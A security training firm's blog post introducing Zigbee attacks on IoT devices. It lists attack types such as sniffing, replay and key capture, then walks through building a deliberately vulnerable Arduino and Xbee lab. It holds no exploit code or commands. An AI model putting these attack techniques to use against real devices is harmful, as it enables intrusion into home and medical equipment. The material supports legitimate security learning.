Zigbee security and exploitation for IoT devices

Written by | Internet of Things, Security, Training

zigbee sniffing and security

While working on our training material for the Offensive IoT Exploitation course, we here at Attify did a ton of in-depth research into all the possible aspects of IoT devices. One of the component that we focused primarily, in radio based exploitation was Zigbee Security, which is arguably the most popular IoT radio communication protocol in Smart Homes and Medical Devices.

Introduction to Zigbee

Zigbee is one of the most common communication protocol found in Smart Home devices and several other categories of IoT devices. The extremely power efficient nature, mesh networking and ease of usage makes Zigbee one of the popular choice among manufacturers.

It’s a specification built on top of the IEEE 802.15.4, and an open protocol created by the member companies of Zigbee Alliance, which include companies like TI, Silicon Labs, Philips and many others.

There have been a number of iterations of the Zigbee protocol, the most recent at the time of writing being Zigbee 3.0.   

Attacks possible  

Zigbee being a radio communication protocol suffers from the standard radio based vulnerabilities. Some of the attacks that are possible in Zigbee communications are :

  1. Attackers being able to sniff the data being transmitted
  2. Replaying of packets after capturing it to perform malicious actions
  3. Sniffing of the encryption key during the initial communication
  4. Modification of the captured packets and then replaying
  5. Spoofing based attacks
  6. Denial of Service situations

This blog post is an introductory guide to set things up in case you would like to learn Zigbee exploitation on your own and perform additional exploitation of each of the vulnerabilities mentioned above.

Hardware Required

Before reading the hardware required section, bear in mind that this is one of the possible combination you could use to get started with Zigbee Security. There could be innumerable types of hardware you could use – such as using a Zigbee dev kit, using a commercial IoT device emitting Zigbee signals and so on.

Below is a simple setup which you can get started with:

  1. Arduino Uno/Nano
  2. DigiKey Xbee module / Arduino Xbee shield
  3. Atmel RzRaven USB stick
  4. Attify Badge

Arduino : Arduino is the de-facto to get started into any sort of electronics projects. Chances are high that you might have used this in your university or high school. The Nano is the most smallest Arduino nano, but sufficient enough for our purposes.

DigiKey Xbee module / Xbee Shield : In order to learn Zigbee, you need something which can transmit and receive Zigbee signals. Xbee is a full duplex transceiver capable of wirelessly communicating with other Xbee modules using Zigbee standard protocol.

Atmel RzRaven USB Stick: This is the half-duplex module which performs the “magic” of sniffing and transmitting modified captured Zigbee packets. If you’re familiar with other sort of radio exploitation, consider this as the “HackRF for Zigbee”.

Attify Badge: You can use this to program the Xbee module with XCTU and plugging in the badge on your system. This is because Xbee usually doesn’t have the miniUSB or similar port which could be used to directly plug it in and program. In case you don’t have Attify Badge or similar hardware, head out to Amazon or your local store and order a mini USB kit for Xbee – something like this.

MiniUSB board for Xbee

MiniUSB board for Xbee (img src : robosavvy.com)

 

Or you can order Attify Badge by emailing us .   

Hacking IoT Embedded devices with Attify

Hacking IoT Embedded devices with Attify

For programming and hardware connections, it’s pretty straightforward in this case. Connect power => power, Gnd => Gnd, Tx to Rx and Rx to Tx. You might want to look up the datasheet of the Xbee module version which you have with you.  

Programming Arduino and Xbee

Programming Arduino

In order to program Arduino, simply download and open up the Arduino IDE from here https://www.arduino.cc/en/Main/Software . Once loaded, open up the Hub and node programs from the Attify’s github repo to each of the Arduino one after the other.

The code has been detailed with inline comments to help you understand what the code means.On an additional note, the code sample provided also takes the temperature, humidity and light values via the sensors and uses the DHT library. It is perfectly fine in case you decide to do the entire analysis and exploitation with a hardcoded string being transmitted, instead of the DHT values. Or, if you would like to use the code as it is, make sure to buy the DHT11 and additional required devices that go along with it.

Tools needed

Schematics

Node code :

 

Hub code :

Also below are the schematics in case you want to build an exact similar setup as our starting kit :

Node Schematics:

Node Schematics for Zigbee vulnerable setup

Node Schematics for Zigbee vulnerable setup

Hub Schematics

Hub Schematics for Zigbee vulnerable setup

Hub Schematics for Zigbee vulnerable setup

Once you have programmed both the Arduinos, the next step is to configure the Xbees using XCTU.

Programming Xbee

Launch XCTU and click on Discover Radio modules. It’ll show you the list of available COM ports where devices have been plugged in. Select the one which corresponds to the Xbee module (or select all in case you are not quite sure).

The additional configuration will be 8N1 as always, 8 data bits, no parity bit and 1 stop bit . Additionally, you would also need to specify the baud rate for your given Xbee module. In case you are not aware of what baudrate your module is using, you can always select all in the baudrates for the module and XCTU will scan with all baudrate and find the correct one for you.

Once you hit Finish searching for the module, it will identify the device. Click on Add the Device.

Device being identified in XCTU

Device being identified in XCTU

At this step, you’ll be shown the various properties of the device such as the Channel name and the PAN ID – the two properties which matter to us at the moment. In Zigbee, there are a total of 16 channels for each band and each channel is spaced 5MHz apart with 2 MHz of bandwidth usage for noiseless data transmission. A list of all the Zigbee channels can be found here. A PAN ID for a Zigbee network is a unique identifier which is the same for all devices on the network.

Configure the channel name and PAN ID to any particular value. You just need to ensure that the other Xbee should have the same Channel name and the PAN ID.

Xbee properties in XCTU

Xbee properties in XCTU

That is all required to complete the setup for the vulnerable lab for Zigbee. In the upcoming blog posts on Zigbee, we will see some exploitation techniques which we can perform on this setup and also take control of a commercial device emitting Zigbee signals.

If you would like to know more about IoT Exploitation techniques, attend one of our public training or sign up for the online course at SecurityTube.

Last modified: February 7, 2017

Leave a Reply

Your email address will not be published. Required fields are marked *